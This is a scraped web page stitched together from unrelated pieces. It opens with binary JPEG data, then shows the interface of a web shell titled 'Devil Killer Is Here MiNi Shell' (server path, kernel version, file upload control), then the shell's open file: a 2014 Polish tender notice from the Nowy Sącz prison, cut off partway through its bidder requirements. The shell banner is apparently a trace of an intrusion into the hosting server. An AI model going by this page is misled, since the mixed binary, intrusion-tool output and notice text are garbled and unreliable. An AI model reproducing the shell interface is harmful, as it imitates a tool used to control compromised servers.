JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140228/68262-N-2014.html

<p class="kh_header"><b>Nowy Sącz: Pełnienie funkcji Inżyniera Kontraktu zadania inwestycyjnego pn.  Termomodernizacja obiektów Zakładu Karnego w Nowym Sączu</b><br>
<b>Numer ogłoszenia: 68262 - 2014; data zamieszczenia: 28.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny , ul. Pijarska 1, 33-300 Nowy Sącz, woj. małopolskie, tel. 018 4485600, faks 018 4485609.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Służba Więzienna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Inżyniera Kontraktu zadania inwestycyjnego pn.  Termomodernizacja obiektów Zakładu Karnego w Nowym Sączu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie funkcji Inżyniera Kontraktu, zwanym dalej  Wykonawcą, polegającej na  świadczeniu usług związanych z zarządzaniem, koordynowaniem, rozliczaniem, promocją, kontrolą i nadzorem inwestorskim realizacji zadania inwestycyjnego  pn.  Termomodernizacja obiektów Zakładu Karnego w Nowym Sączu zwanym  zadaniem inwestycyjnym.

Zadanie inwestycyjne  termomodernizacji obiektów Zakładu Karnego w Nowym Sączu  obejmuje następujące roboty budowlano - instalacyjne  

-docieplenie stropu ostatniej kondygnacji budynków  Pawilonów mieszkalnych A i B 
-wymiana drewnianej stolarki okiennej na energooszczędne okna z PCV w Pawilonach mieszkalnych Ai B
-wymiana drewnianej stolarki drzwiowej na energooszczędną stolarkę aluminiową 
-docieplenie zewnętrznych ścian budynków  Pawilonu mieszkalnego A i B  z położeniem tynków w cienkowarstwowej technologii klejowej
-wykonanie w budynkach Pawilonów mieszkalnych A i B systemu mechanicznej wentylacji nawiewno - wywiewnej z odzyskiem ciepła
-wykonanie konstrukcji wsporczej , montaż i włączenie systemu  paneli solarnych w układ wytwarzania ciepłej wody użytkowej dla potrzeb socjalnych jednostki
-kompleksowa wymiana oświetlenia w pomieszczeniach Pawilonów mieszkalnych A i B na energooszczędne systemy oświetleniowe
-przebudowa dachu budynku Pawilonu mieszkalnego A z wymianą jego pokrycia i obróbek blacharskich 
-przebudowa dachu budynku Pawilonu mieszkalnego B z wymianą jego pokrycia i obróbek blacharskich
-przebudowa sieci komputerowych , teletechnicznych i gniazd dedykowanych w budynkach jednostki
-budowa sieci telewizji kablowej w budynkach Pawilonu mieszkalnego A i B
-przeniesienie i adaptacja pomieszczeń Ambulatorium z Izbą Chorych do warunków Rozp. Min. Sprawiedliwości z dn. 05.07.2012 r.  w sprawie szczególnych wymagań, jakim powinny odpowiadać pomieszczenia i urządzenia podmiotu leczniczego dla osób pozbawionych wolności (Dz.U. poz. 808 z dn. 13.07.2012 r.)
	Roboty budowlano - instalacyjne dofinansowano ze środków Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej (zwanym dalej NFOŚiGW) w ramach programu priorytetowego System Zielonych Inwestycji (GIS - Green  Investment Scheme) Część 5) Zarządzanie energią w budynkach wybranych  podmiotów sektora finansów publicznych.
Wykonywane one będą zgodnie z odpowiednią dokumentacją projektową, przez wykonawcę wybranego w wyniku przeprowadzenia postępowania o udzielenie zamówienia publicznego.
 
W ramach wykonania przedmiotu zamówienia, Inżynier Kontraktu zobowiązany jest do 

Przez cały czas trwania realizacji zadania inwestycyjnego 

-reprezentowania Zamawiającego jako Inwestora, na podstawie udzielonego mu pełnomocnictwa, w tym przygotowywania stosownych dokumentów,
-wymiany informacji z Zamawiającym oraz prowadzenia swojej działalności zgodnie z wymaganiami Zamawiającego,
-utrzymywania odpowiednich kontaktów z podmiotami związanymi z realizacją zadania inwestycyjnego,
-analizowania i sugerowania Zamawiającemu wszelkich zmian w dokumentacji projektowo - wykonawczej, które mogą okazać się niezbędne lub pożądane podczas realizacji robót budowlano-instalacyjnych,
-analizowania wszystkich decyzji, uzgodnień, postanowień i innych dokumentów sporządzanych w trakcie przygotowania i realizacji zadania inwestycyjnego  i zapewnienia wykonania wynikających z ich treści działań, spełnienia wymagań itp.
-współpracy z Zamawiającym we wszystkich działaniach związanych z przygotowaniem i realizacją zadania inwestycyjnego,
-wyposażenia i zaopatrzenia zatrudnionych przez siebie osób w niezbędne do realizacji przedmiotu zamówienia materiały i urządzenia, oraz jeśli zajdzie taka potrzeba, zapewni im niezbędne warunki, wsparcie i pomoc techniczną,
-zgodnego z wytycznymi i instrukcjami NFOŚiGW oraz zawartą przez Zamawiającego i NFOŚiGW) Umową (Nr 563/2013/Wn-06/OA-TR-KU/D z dn.20.08.2013 r.) o realizację zadania państwowej jednostki budżetowej zakwalifikowanego do dofinansowania, sporządzania niezbędnych dokumentów do jej rozliczania (zestawienia, sprawozdania, rozliczenia, harmonogramy itp.),
-promocji projektu zgodnie z instrukcjami i wytycznymi NFOŚiGW w ramach programu priorytetowego GIS Green Investment Scheme Część 5) Zarządzanie energią w budynkach wybranych podmiotów sektora finansów publicznych,
-w razie konieczności, uzyskania przez wykonawcę robót budowlano - montażowych zadania inwestycyjnego pozwoleń na użytkowanie obiektów
-uzyskania pisemnej zgody Zamawiającego, w przypadku podejmowania decyzji, które powodowałyby konieczność ponoszenia przez niego dodatkowych nakładów finansowych podczas realizacji zadania inwestycyjnego, 

Na etapie poprzedzającym realizację zadania inwestycyjnego 

-zweryfikowania dokumentacji projektowej zadania inwestycyjnego w celu sprawdzenia wzajemnej zgodności i kompletności poszczególnych elementów składających się na tą dokumentację,
-przeprowadzenia inspekcji terenu i miejsc wykonywania robót budowlano - montażowych zadania inwestycyjnego celem sprawdzenia i porównania stanu istniejącego z dokumentacją projektową,
-wskazania ewentualnych zmian lub błędów w dokumentacji projektowej oraz określenie ich wpływu na realizację zadania inwestycyjnego oraz zaproponowania niezbędnych zmian lub rozwiązań,
-sporządzenia i przekazania Zamawiającemu do zatwierdzenia instrukcji, określających formę, zakres i sposób obiegu dokumentów, sporządzanych w trakcie realizacji zadania inwestycyjnego, 

Na etapie realizacji zadania inwestycyjnego 

-sprawdzania w trakcie realizacji zadania inwestycyjnego posiadania i przedkładanie Zamawiającemu, wymaganych od wykonawcy robót budowlano - montażowych, ubezpieczeń i gwarancji, 
-przekazania wykonawcy robót budowlano - montażowych przy udziale Zamawiającego, terenu i miejsca robót
-przekazania wykonawcy robót budowlano - montażowych, dokumentacji projektowej i innych dokumentów dotyczących realizacji zadania inwestycyjnego, otrzymanych od  Zamawiającego,
-przekazania wykonawcy robót budowlano - montażowych zadania inwestycyjnego, wypełnionego zgodnie z odpowiednimi przepisami, zarejestrowanego Dziennika Budowy,
-sporządzenia i przekazania wykonawcy robót budowlano - montażowych, zatwierdzonego przez Zamawiającego wzoru raportu o postępie prac,
-powiadomienia właściwych organów nadzoru budowlanego o zamiarze rozpoczęcia robót budowlano - montażowych, 
-nadzoru nad postępem robót budowlano - montażowych pod względem technicznym, formalnym,  terminowym, jakościowym, finansowym oraz organizacyjnym, 
-koordynacji nadzoru archeologicznego nad prowadzonymi pracami budowlano - montażowymi, 
-informowania Zamawiającego o wadach dokumentacji projektowej w terminach umożliwiających ich usunięcie przez autora projektu bez opóźnienia terminu zakończenia robót budowlano - montażowych,
-kontroli dokumentów jakości, deklaracji zgodności i certyfikatów materiałów budowlanych,  instalacyjnych i urządzeń przewidzianych do wbudowania oraz zatwierdzania ich zastosowania podczas robót budowlano - montażowych, 
-sprawdzania aktualności ochrony ubezpieczeniowej od odpowiedzialności cywilnej na wykonywaną działalność wykonawcy robót budowlano - montażowych w całym okresie realizacji zadania inwestycyjnego,
-sprawdzania zgodności dostaw wyposażenia i urządzeń z dokumentacją projektową zadania inwestycyjnego oraz kompletności wymaganych atestów, aprobat i gwarancji na w/w wyposażenie i urządzenia,
-kontroli sposobu składowania, przechowywania materiałów i urządzeń oraz uporządkowania  miejsc składowania po zakończeniu robót budowlano - montażowych,
-wzajemnej koordynacji wszystkich branż robót budowlano - montażowych zadania inwestycyjnego, 
-koordynacji wykonywanych robót budowlano - montażowych tak, aby nie zakłócić pracy istniejących instalacji i sieci infrastruktury technicznej obiektów budowlanych Zamawiającego ,
-dołożenia wszelkich starań w celu zapewnienia terminowego zakończenia realizacji zadania inwestycyjnego przy zachowaniu minimalnego stopnia utrudnień dla właścicieli nieruchomości, przyległych do miejsc wykonywanych prac, 
-nadzoru nad właściwym przestrzeganiem wewnętrznych przepisów Zamawiającego w tym BHP, podczas wykonywanych prac budowlano - montażowych,
-monitorowania zagrożeń dla środowiska naturalnego ze szczególnym uwzględnieniem gniazd i siedlisk ptaków i nietoperzy,
-nadzoru pracy i skuteczności zatrudnionych przez siebie pracowników, a w szczególności  inspektów nadzoru, w miejscu wykonywania robót budowlano - montażowych oraz bieżąca kontrola ich uprawnień do wykonywania samodzielnych funkcji w budownictwie podczas całego okresu realizacji zadania inwestycyjnego,
-dokonywania przeglądu zapisów w dzienniku budowy oraz potwierdzania w nim swojej obecności w miejscu prowadzenia robót budowlano - montażowych,
-obecności w miejscach prac z częstotliwością zapewniającą właściwe realizowanie powierzonych mu zadań oraz  dokumentowania w dzienniku budowy zrealizowanych przez siebie czynności,
-sprawdzania jakości wykonania robót, powiadamiania wykonawcy robót budowlano - montażowych o ich wadach, ustalania rodzaju i zakresu prac koniecznych do usunięcia wad oraz poświadczania ich usunięcia,
-przedstawiania Zamawiającemu informacji  z postępu prac oraz zaangażowania rzeczowo - finansowego zadania inwestycyjnego z uwzględnieniem warunków określonych przez NFOŚiGW,
-bieżącego kwalifikowania kosztów zadania inwestycyjnego zgodnie z wytycznymi NFOŚiGW dotyczącymi programu priorytetowego GIS Green Investment Scheme Część 5) Zarządzanie energią w budynkach wybranych podmiotów sektora finansów publicznych (wskazywanie kosztów kwalifikowanych /niekwalifikowanych),
-sporządzania niezbędnych dokumentów rozliczeniowych robót budowlano - montażowych z zakresu rzeczowo - finansowego, bieżącej kontroli poziomu finansowania oraz budżetu zadania inwestycyjnego,  
-bieżącego informowania Zamawiającego o występujących lub mogących wystąpić problemach dotyczących realizacji zadania inwestycyjnego i podejmowanych działaniach zapobiegawczych dla ich przezwyciężenia, zapobiegania zdarzeniom, mogącym prowadzić do powstania roszczeń wykonawcy robót budowlano - montażowych w stosunku do Zamawiającego,
-przeprowadzania z wykonawcą robót budowlano - instalacyjnych odbiorów robót ulegających zakryciu lub zanikających, niezbędnych przeglądów i odbiorów częściowych oraz odbiorów końcowych, realizowanego zadania inwestycyjnego z udziałem przedstawicieli Zamawiającego o ile Zamawiający uzna swój udział za konieczny,
-oceny i weryfikacji konieczności wykonania prac dodatkowych, zamiennych lub zmian, przedstawionych przez wykonawcę robót budowlano montażowych w zakresie finansowym i rzeczowym oraz przedłożenia do decyzji Zamawiającego,
-sprawdzania i akceptowania częściowych i końcowych oświadczeń wykonawcy robót budowlano - montażowych o wykonaniu robót .
-sprawdzania i akceptacji pod względem merytorycznym i rzeczowo - finansowym faktur wystawianych przez wykonawcę robót budowlano - montażowych, do zapłaty przez Zamawiającego,
-dokumentowania postępów prac oraz płatności,
-sporządzania dokumentacji z realizacji zadania inwestycyjnego w odstępach miesięcznych, w formie filmów i zdjęć cyfrowych z zapisaną datą, nagranych na nośnik cyfrowy (płyty DVD lub CD),
-współpracy z Zamawiającym w zakresie informacji, promocji i konsultacji społecznych dotyczących realizacji zadania inwestycyjnego,
-organizowania spotkań dotyczących realizacji zadania inwestycyjnego (minimum dwa razy w miesiącu lub w miarę potrzeb częściej), sporządzania protokołów z tych spotkań oraz przekazywania ich wszystkim uczestnikom,
-obsługi, w zakresie swoich praw i obowiązków, kontroli realizacji zadania inwestycyjnego, przeprowadzanych przez przedstawicieli uprawnionych podmiotów (NFOŚiGW i inne),
-udziału w spotkaniach i podczas wizyt przedstawicieli organów nadzorujących działalność Zamawiającego,
-udzielania wykonawcy robót budowlano - montażowych pomocy w zakresie sporządzania i uzyskiwania wszelkich dokumentów niezbędnych do realizacji zadania inwestycyjnego, bieżącego informowania go o obowiązujących przepisach i procedurach formalnoprawnych i administracyjnych (ze szczególnym uwzględnieniem zmian wprowadzanych do obowiązujących przepisów),
-udziału w odpowiednich postępowaniach arbitrażowych oraz rozwiązywania skarg i roszczeń osób trzecich, wynikłych podczas realizacji zadania inwestycyjnego,
-natychmiastowego wstrzymania prac wykonywanych w sposób zagrażający zdrowiu lub życiu ludzi, bezpieczeństwu Zamawiającego, zniszczeniu lub uszkodzeniu jego mienia oraz niezgodnych z umową na wykonanie robót budowlano - montażowych,
-bieżących przeglądów miejsc i terenu prac pod względem zachowania zasad BHP i wewnętrznych przepisów Zamawiającego, a w przypadku stwierdzenia nieprawidłowości, niezwłocznego sporządzenia odpowiedniej informacji dla Zamawiającego i wykonawcy robót budowlano - montażowych,
-w przypadku wypowiedzenia przez wykonawcę umowy na roboty budowlano - montażowe : rozliczenia rzeczowo - finansowego tej umowy oraz dopilnowania właściwego zabezpieczenia miejsc wykonywanych prac, 
-nadzoru oraz sprawdzenia i akceptacji wyników, zgodnych z właściwymi  przepisami, prób i pomiarów dotyczących zadania inwestycyjnego
-nadzoru nad rozruchem instalacji i urządzeń zadania inwestycyjnego przy ich oddaniu do eksploatacji wraz ze sprawdzeniem i odpowiednią weryfikacją instrukcji obsługi (gdzie jest to konieczne), 
-udziału w przekazaniu przez wykonawcę robót budowlano - montażowych wykonanych obiektów, instalacji i urządzeń do eksploatacji,
-sprawdzenia i zatwierdzenia zgodności ze stanem faktycznym dokumentacji powykonawczej zadania inwestycyjnego, a następnie dostarczenia jej Zamawiającemu w ustalonej wcześniej formie,
-obsługi dokumentacyjnej odbiorów częściowych i końcowego a w szczególności do przygotowywania protokołów odbioru robót,
-przedkładania Zamawiającemu, miesięcznych raportów z ilości zużytej przez wykonawcę robót budowlano - montażowych energii elektrycznej i wody,
-nadzoru, koordynacji oraz wykonania, w ramach swoich praw i obowiązków, postanowień  wynikających z : Decyzji nr 293/2012 Prezydenta miasta Nowego Sącza z dnia 13.06.2013 r. znak WPP.6740.190.2010.DA oraz  Pozwolenia Nr 52/2012 Wojewódzkiego Konserwatora Zabytków z dnia 27.03.2012 r. znak OZNS.5142.33.2012.MB.1 wraz z Decyzją nr 16/2012 z dnia 29.05.2012 r. w sprawie zmiany Pozwolenia Konserwatorskiego nr 52/2012 z dnia 27.03.2012 r.

Na etapie po zakończeniu realizacji zadania inwestycyjnego 

-zakończenia i rozliczenia się z Zamawiającym ze swoich zadań i czynności wynikających z obowiązków określonych dla etapu realizacji zadania inwestycyjnego,
-przygotowania dokumentów dla sporządzenia dowodów przyjęcia środków trwałych OT i powiększenia wartości środków trwałych Zamawiającego, 
-sporządzenia Raportu Końcowego odebranego przez Zamawiającego zadania inwestycyjnego w uzgodnionej z nim formie, treści i zakresie rzeczowym, 
-rozliczenia rzeczowo - finansowego zadania inwestycyjnego, zgodnego z wymogami Zamawiającego i NFOŚiGW, 
-sporządzenia harmonogramu i dokonywania zgodnych z nim przeglądów gwarancyjnych odebranego zadania inwestycyjnego,
-gotowości zapewnienia stałego nadzoru i inspekcji w okresie ważności gwarancji udzielonej przez wykonawcę robót budowlano - montażowych,
-przygotowania sprawozdań i dokumentów wymaganych przez NFOŚiGW zgodnie z postanowieniami  Umowy Nr 563/2013/Wn-06/OA-TR-KU/D z dn.20.08.2013 r. o realizację zadania państwowej jednostki budżetowej zakwalifikowanego do dofinansowania.

Ponadto Inżynier Kontraktu, w porozumieniu z Zamawiającym, powinien wykonywać  czynności niewymienione powyżej, które będą niezbędne dla poprawnej realizacji zadania inwestycyjnego i zabezpieczenia interesów Zamawiającego.
Inżynier Kontraktu ponosi wszelkie koszty związane ze sprawowaną funkcją oraz wypełnia wszystkie związane z nią formalności.
Podczas realizacji swoich obowiązków, Inżynier Kontraktu, organizacyjnie i służbowo podlega Zamawiającemu tj. Zakładowi Karnemu w Nowym Sączu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.54.00.00-5, 71.70.00.00-5, 71.24.80.00-8, 71.24.70.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy Wykonawca zobowiązany jest do wniesienia wadium w wysokości: 2 300,00 złotych (słownie: dwa tysiące trzysta złotych 00/100 groszy).
Wadium wnosi się przed upływem terminu składania ofert.
Wadium może być wnoszone w jednej lub kilku następujących formach 

a)pieniądzu,
b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)gwarancjach bankowych,
d)gwarancjach ubezpieczeniowych,
e)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości  (Dz.U. z 2007 r. Nr 42, poz. 275, z poźn. zm.).

Wadium wnoszone w pieniądzu wpłaca się na rachunek bankowy Zamawiającego   
NBP Kraków  37  1010  1270  0033  9113  9120  0000, przy czym za termin wniesienia wadium w tej formie  przyjmuje się termin uznania wpłaty na rachunku Zamawiającego.  
W przypadku wnoszenia wadium w pieniądzu, dowód wniesienia wadium winien być załączony do oferty w postaci oryginału lub kopii. 
W przypadku wnoszenia wadium w pozostałych formach, do oferty musi zostać załączony oryginał dowodu wniesienia wadium. Dokument potwierdzający wniesienie wadium musi  jednoznacznie określać Zamawiającego jako beneficjenta wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie tego warunku na podstawie treści złożonych wraz z formularzem oferty dokumentów, wyszczególnionych w Rozdziale 6 SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie tego warunku na podstawie treści złożonych wraz z formularzem oferty dokumentów, wyszczególnionych w Rozdziale 6 SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie tego warunku na podstawie treści złożonych wraz z formularzem oferty dokumentów, wyszczególnionych w Rozdziale 6 SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie tego warunku na podstawie treści złożonych wraz z formularzem oferty dokumentów, wyszczególnionych w Rozdziale 6 SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie tego warunku na podstawie treści złożonych wraz z formularzem oferty dokumentów, wyszczególnionych w Rozdziale 6 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

